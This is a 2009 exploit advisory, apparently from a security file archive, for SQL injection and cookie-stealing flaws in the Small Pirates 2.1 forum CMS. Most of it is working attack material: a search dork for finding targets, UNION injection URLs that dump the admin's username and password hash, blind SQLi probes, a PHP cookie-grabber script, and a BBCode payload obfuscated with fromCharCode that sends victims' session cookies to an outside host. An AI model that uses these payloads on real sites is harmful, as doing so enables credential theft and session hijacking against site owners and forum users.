Small Pirates 2.1 SQL Injection

Small Pirates 2.1 SQL Injection: Posted May 29, 2009; Authored by YEnH4ckEr; Small Pirates version 2.1 suffers from SQL injection and cookie stealing vulnerabilities.; tags | exploit, vulnerability, sql injection; MD5 | 4943da5943d5edd9d5fad62b3d1502d6; Download | Favorite | Comments (0)

Small Pirates 2.1 SQL Injection

----------------------------------------------------------
MULTIPLE REMOTE VULNERABILITIES --Small Pirates v-2.1-->
----------------------------------------------------------

CMS INFORMATION:

-->WEB: http://spirate.net/foro/
-->DOWNLOAD: http://spirate.net/foro/  
-->DEMO: http://www.santiagoescraches.com.ar/index.php
-->CATEGORY: CMS / Board

CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORK: "Basado en Spirate"
-->CATEGORY: SQL INJECTION VULNERABILITIES / COOKIE STEALING / BLIND SQL INJECTION
-->AFFECT VERSION: <= 2.1
-->Discovered Bug date: 2009-05-10
-->Reported Bug date: 2009-05-10
-->Fixed bug date: N/A
-->Info patch: Not fixed
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)



#########################
////////////////////////

SQL INJECTION (SQLi):

////////////////////////
#########################


<<<<---------++++++++++++++ Condition: Nothing +++++++++++++++++--------->>>>


-------
INTRO:
-------


This system is a mixed combinations.

Info by admin (quote):

"cw*= SMF+Paquetes"
"Spirate=cw+añadidos+reparaciones+correcciones"

"*cw = casitaweb."


-------------------
PROOFS OF CONCEPT:
-------------------


[++] GET var --> 'id'

[++] File vuln --> 'pag1.php'


~~~~~> http://[HOST]/pag1.php?id=-1+UNION+ALL+SELECT+1,2,3,version(),5,6/*


[++] GET var --> 'id'

[++] File vuln --> 'pag1-guest.php'


~~~~~> http://[HOST]/pag1-guest.php?id=-1+UNION+ALL+SELECT+1,2,3,concat(user(),0x3A3A3A,database()),5,6/*


[++] GET var --> 'id'

[++] File vuln --> 'rss-coment_post.php'

[++] Note --> More info in source code


~~~~~> http://[HOST]/web/rss/rss-coment_post.php?id=-1+UNION+ALL+SELECT+1,2,concat(user(),0x3A3A,database()),4,5,6,version(),8/*



[++] GET var --> 'id'

[++] File vuln --> 'rss-pic-comment.php'

[++] Note --> More info in source code


~~~~~> http://[HOST]/web/rss/rss-pic-comment.php?id=-1+UNION+ALL+SELECT+1,2,3,4,current_user(),6,user(),8,9,user(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,version(),31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81/*


[++[Return]++] ~~~~~> user, version and database.


----------
EXPLOITS:
----------


~~~~~> http://[HOST]/pag1.php?id=-1+UNION+ALL+SELECT+1,2,3,concat(memberName,0x3A3A3A,passwd),5,6+FROM+smf_members+WHERE+ID_MEMBER=1/*

~~~~~> http://[HOST]/pag1-guest.php?id=-1+UNION+ALL+SELECT+1,2,3,concat(memberName,0x3A3A3A,passwd),5,6+FROM+smf_members+WHERE+ID_MEMBER=1/*

~~~~~> http://[HOST]/web/rss/rss-coment_post.php?id=-1+UNION+ALL+SELECT+1,2,concat(memberName,0x3A3A3A,passwd),4,5,6,concat(memberName,0x3A3A3A,passwd),8+FROM+smf_members+WHERE+ID_MEMBER=1/*

~~~~~> http://[HOST]/web/rss/rss-pic-comment.php?id=-1+UNION+ALL+SELECT+1,2,3,4,concat(memberName,0x3A3A3A,passwd),6,concat(memberName,0x3A3A3A,passwd),8,9,concat(memberName,0x3A3A3A,passwd),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,concat(memberName,0x3A3A3A,passwd),31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81+FROM+smf_members+WHERE+ID_MEMBER=1/*


[++[Return]++] ~~~~~> memberName:::passwd in 'members' table



######################################
//////////////////////////////////////

COOKIE STEALING VULN (BYPASS BBCODE):

//////////////////////////////////////
######################################


<<<<---------++++++++++++++ Condition: Post a comment +++++++++++++++++--------->>>>


-------
INTRO:
-------


This system is a mixed combinations.

Info by admin (quote):

"cw*= SMF+Paquetes"
"Spirate=cw+añadidos+reparaciones+correcciones"

"*cw = casitaweb."


-------------------
PROOF OF CONCEPT:
-------------------


[url][img]http://www.google.es onmouseover=while(true){alert(1);} [/img][/url]


[++[Return]++] ~~~~~> recursive alert message saying "1"


----------
EXPLOIT:
----------


Cookie Grabber Script --> capturethecookies.php

Example Script (Before Creat exploited.txt):

<?php
$ck=$_GET["ck"]; //Capture the cookies   
$manejador=fopen("exploited.txt",'a');
fwrite($manejador, "Cookie:\r\n".htmlentities($ck)."\r\n--EOF--\r\n"); //Save the values
fclose($manejador);
echo "<script>location.href='http://[HOST]/index.php';</script>"; //Redirect...
?>

Example Hosting --> http://www.myphpcookiestealing.es/capturethecookies.php?ck=

Poisoning's comment:

[url][img]http://www.owned.owned onmouseover=document.location=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,109,121,112,104,112,99,111,111,107,105,101,115,116,101,97,108,105,110,103,46,101,115,47,99,97,112,116,117,114,101,116,104,101,99,111,111,107,105,101,115,46,112,104,112,63,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61)+document.cookie [/img][/url]


[++[Return]++] ~~~~~> Cookie and PHPSESSID in exploited.txt


###########################
///////////////////////////

BLIND SQL INJECTION (SQLi):

///////////////////////////
###########################


<<<<---------++++++++++++++ Condition: Nothing +++++++++++++++++--------->>>>


-------
INTRO:
-------


This system is a mixed combinations.

Info by admin (quote):

"cw*= SMF+Paquetes"
"Spirate=cw+añadidos+reparaciones+correcciones"

"*cw = casitaweb."


-------------------
PROOFS OF CONCEPT:
-------------------


[++] GET var --> 'id'

[++] File vuln --> 'index.php'


~~~~~> http://[HOST]/?type=rss;action=.xml;sa=comentarios;id=7+and+1=1 --> TRUE

~~~~~> http://[HOST]/?type=rss;action=.xml;sa=comentarios;id=7+and+1=0 --> FALSE


----------
EXPLOITS:
----------


~~~~~> http://[HOST]/?type=rss;action=.xml;sa=comentarios;id=7+and+substring(@@version,1,1)=5 --> TRUE

~~~~~> http://[HOST]/?type=rss;action=.xml;sa=comentarios;id=7+and+substring(@@version,1,1)=4 --> FALSE



#######################################################################
#######################################################################
##*******************************************************************##
##      SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray ...     ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO: SPANISH H4ck3Rs community!                ##
##*******************************************************************##
#######################################################################
#######################################################################

Comments

Subscribe to this comment feed

No comments yet, be the first!

Top Authors In Last 30 Days

Heine Pedersen 29 files
Torben Jensen 29 files
Farbod Mahini 26 files
Ubuntu 26 files
Red Hat 25 files
Debian 24 files
Mandriva 17 files
sinn3r 11 files
the_cyber_nuxbie 10 files
Am!r 9 files

File Archives

Systems

AIX (352)
Apple (963)
BSD (302)
Cisco (1,247)
Debian (3,802)
Fedora (1,660)
FreeBSD (1,024)
Gentoo (2,468)
HPUX (685)
iPhone (95)
IRIX (217)
Juniper (60)
Linux (20,649)
Mac OS X (415)
Mandriva (2,205)
NetBSD (235)
OpenBSD (414)
RedHat (2,431)
Slackware (378)
Solaris (1,472)
SUSE (1,228)
Ubuntu (2,728)
UNIX (6,852)
UnixWare (148)
Windows (4,019)
Other

Small Pirates 2.1 SQL Injection

Small Pirates 2.1 SQL Injection

Comments

File Archive:

May 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Small Pirates 2.1 SQL Injection

Share This

Small Pirates 2.1 SQL Injection

Comments

File Archive:

May 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems